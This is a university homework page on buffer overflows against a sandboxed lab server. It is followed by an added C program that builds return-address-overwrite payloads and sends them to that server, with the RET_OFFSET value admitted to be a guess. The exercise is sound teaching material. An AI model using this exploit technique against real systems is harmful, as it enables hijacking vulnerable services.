HW2: Buffer Overflow by Example
CS 493/693 Homework,
Dr. Lawlor, 2006/02/06. Due at 5pm on Monday, Feb 13 (Monday the 13th!).
I've started a vulnerable network server process, listening on port 80
of the server "target.cs.uaf.edu". Your assignment is to see
firsthand how a buffer
overflow attack works, by attacking this port of this server.
Allow me to be very clear. DO NOT ATTACK ANY OTHER PORT OR MACHINE.
The server listening on port 80 of target.cs.uaf.edu is NOT a
webserver. Instead, it speaks the following very simple protocol:
- The server sends you a welcome string followed by a newline.
- You send the server your UAF email ID (like "ffosl") followed by a newline.
- You send the server an arbitrary attack buffer, followed by a newline.
- The server then runs its laughably insecure vulnerable routine (see the server source) on your attack buffer "req".
- The server records and sends back your grade and a short explanation, followed by a newline.
The grade levels available for this assignment are:
- F (5 points for 493, 2 points for 693): for giving your email ID and a non-dangerous string. (Note: "F" is still more points than a "0".)
- D (6 points, 4 points for 693): for crashing the server with a segfault, illegal instruction, or hang. (Don't worry--it'll immediately
- C (7 points, 6 points for 693): for calling the "grade_C" routine.
- B (9 points, 8 points for 693): for calling the "grade" routine, and passing in the "grade_B" string.
- A (10 points): for calling the "grade" routine with your own string that starts with "A".
I'll keep your highest grade--you can repeatedly attack the server as many times as you like. Please do not run a denial-of-service against the target, or try to break out of the emulated machine.
You should be able to get at least a "D" using just "telnet" run
interactively. For higher grade levels, writing your own network
attacker program is recommended. If you log in and send two strings-and-newlines
without immediately getting a one-line grade back, send me an
email--the target may have gone down.
The vulnerable server has this source code, which you'll pretty much have to read. You could even compile and run the server, although be careful not to get hacked yourself! The relevant addresses as actually run (hint, hint!) are:
grade_C routine is at 0x8048d68
grade_B string is at 0x8082357
grade routine is at 0x8048cb4
Inside vulnerable routine:
buf is at 0xbfffff28
This vulnerable server runs:
- after a step of logging and filtering on the target front end, which also redirects the attacking port from port 80 on target.cs.uaf.edu to port 1235 on the emulated machine;
- as a "nobody" user, inside a "chroot" jail, inside a QEMU virtual machine that is itself run as a "nobody" user, on the worthless machine target.cs.uaf.edu.
So don't worry about breaking anything too important--and have fun! You don't need to turn anything in--I can get your grade out of the server logs!
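Here is an added example of the "network attacker program" recommended above. It is my own code, not the assignment's server source or any solution from the page. It builds the attack buffers for the C, B and A levels from the four addresses listed above and delivers one of them over the page's four-step protocol. It assumes a 32-bit x86 Linux target using the cdecl calling convention (which the 0x0804xxxx/0xbfffxxxx addresses suggest), and it assumes a RET_OFFSET of 64 bytes from the start of buf to the saved return address; that number is made up here and has to be read off the server source (buf size, any other locals, and the saved frame pointer). The 0x58585858 fake return address and the "A for effort" string are also mine.

```c
/* Added example, not from the assignment page. Payload builder plus TCP
 * client for the HW2 target. RET_OFFSET is an assumption; see the comment. */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>

/* Addresses as listed on the assignment page (32-bit x86 Linux). */
#define GRADE_C_ADDR 0x8048d68u   /* grade_C routine */
#define GRADE_B_STR  0x8082357u   /* "grade_B" string in the server binary */
#define GRADE_ADDR   0x8048cb4u   /* grade routine */
#define BUF_ADDR     0xbfffff28u  /* buf, inside the vulnerable routine */

/* ASSUMPTION (not on the page): bytes from the start of buf to the saved
 * return address. Read it off the server source and adjust before attacking. */
#define RET_OFFSET 64

unsigned char scratch[256];       /* shared work buffer for the payload */

/* Little-endian 32-bit store/load so the bytes come out right on any host. */
static size_t put32(unsigned char *p, uint32_t v) {
    p[0] = v; p[1] = v >> 8; p[2] = v >> 16; p[3] = v >> 24; return 4;
}
uint32_t get32(const unsigned char *p, size_t off) {
    p += off;
    return p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* The protocol ends the attack line at '\n', and a strcpy-style copy into
 * buf would stop at NUL, so neither byte may appear anywhere in the payload. */
int payload_is_clean(const unsigned char *p, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (p[i] == '\n' || p[i] == '\0') return 0;
    return 1;
}

/* C: overwrite the saved return address; the vulnerable routine's "ret" then
 * lands in grade_C instead of its caller. */
size_t build_grade_c(unsigned char *out, size_t cap) {
    if (cap < RET_OFFSET + 4) return 0;
    memset(out, 'X', RET_OFFSET);
    return RET_OFFSET + put32(out + RET_OFFSET, GRADE_C_ADDR);
}

/* B: return into grade(const char *). Under 32-bit cdecl a function expects
 * [its return address][its first argument] just above esp on entry, so after
 * the overwritten return address come a fake return address for grade()
 * (never used: the server is restarted) and a pointer to "grade_B". */
size_t build_grade_b(unsigned char *out, size_t cap) {
    if (cap < RET_OFFSET + 12) return 0;
    memset(out, 'X', RET_OFFSET);
    size_t n = RET_OFFSET;
    n += put32(out + n, GRADE_ADDR);    /* saved return address -> grade() */
    n += put32(out + n, 0x58585858u);   /* fake return address for grade() */
    n += put32(out + n, GRADE_B_STR);   /* arg0 = "grade_B" */
    return n;
}

/* A: same fake frame, but arg0 points back into buf just past the frame, where
 * our own string sits. Placing it after the frame keeps any NUL away from the
 * bytes before the return address; the server's line handling terminates it. */
size_t build_grade_a(unsigned char *out, size_t cap, const char *msg) {
    size_t len = strlen(msg);
    if (msg[0] != 'A' || cap < RET_OFFSET + 12 + len) return 0;
    memset(out, 'X', RET_OFFSET);
    size_t n = RET_OFFSET;
    n += put32(out + n, GRADE_ADDR);
    n += put32(out + n, 0x58585858u);
    n += put32(out + n, BUF_ADDR + RET_OFFSET + 12);  /* arg0 = &buf[RET_OFFSET+12] */
    memcpy(out + n, msg, len);
    return n + len;
}

/* Read one '\n'-terminated line, a byte at a time; returns its length. */
static size_t recv_line(int fd, char *line, size_t cap) {
    size_t n = 0; char c;
    while (n + 1 < cap && read(fd, &c, 1) == 1 && c != '\n') line[n++] = c;
    line[n] = '\0';
    return n;
}

/* Speak the page's protocol: welcome, email ID, attack line, grade line. */
static int send_attack(const char *host, const char *port, const char *id,
                       const unsigned char *payload, size_t n) {
    struct addrinfo hints = {0}, *ai;
    hints.ai_socktype = SOCK_STREAM;
    if (getaddrinfo(host, port, &hints, &ai) != 0) return -1;
    int fd = socket(ai->ai_family, ai->ai_socktype, ai->ai_protocol);
    if (fd < 0 || connect(fd, ai->ai_addr, ai->ai_addrlen) < 0) { freeaddrinfo(ai); return -1; }
    freeaddrinfo(ai);
    char line[512];
    recv_line(fd, line, sizeof line);                       /* welcome string */
    printf("server: %s\n", line);
    if (write(fd, id, strlen(id)) < 0 || write(fd, "\n", 1) < 0 ||   /* email ID */
        write(fd, payload, n) < 0 || write(fd, "\n", 1) < 0) {        /* attack */
        close(fd); return -1;
    }
    recv_line(fd, line, sizeof line);                       /* grade + explanation */
    printf("grade: %s\n", line);
    close(fd);
    return 0;
}

int main(int argc, char **argv) {
    if (argc < 3) { fprintf(stderr, "usage: %s <emailid> C|B|A\n", argv[0]); return 1; }
    size_t n = argv[2][0] == 'C' ? build_grade_c(scratch, sizeof scratch)
             : argv[2][0] == 'B' ? build_grade_b(scratch, sizeof scratch)
             :                     build_grade_a(scratch, sizeof scratch, "A for effort");
    if (n == 0 || !payload_is_clean(scratch, n)) { fputs("bad payload\n", stderr); return 1; }
    return send_attack("target.cs.uaf.edu", "80", argv[1], scratch, n) == 0 ? 0 : 1;
}
```

Build with cc -o attack attack.c and run ./attack <emailid> C (or B or A). Before anything is sent, payload_is_clean() confirms that no 0x0a or 0x00 byte ended up in the buffer; that check passes for all four addresses quoted on the page, which is what lets them survive a newline-terminated protocol and a strcpy-style copy into buf. Note that the pointer for the A level is computed from the page's buf address plus the assumed RET_OFFSET, so if the offset is wrong both the return-address overwrite and the string pointer are wrong; get the offset right first (a D-level crash confirms you are at least reaching the return address), then move on to B and A.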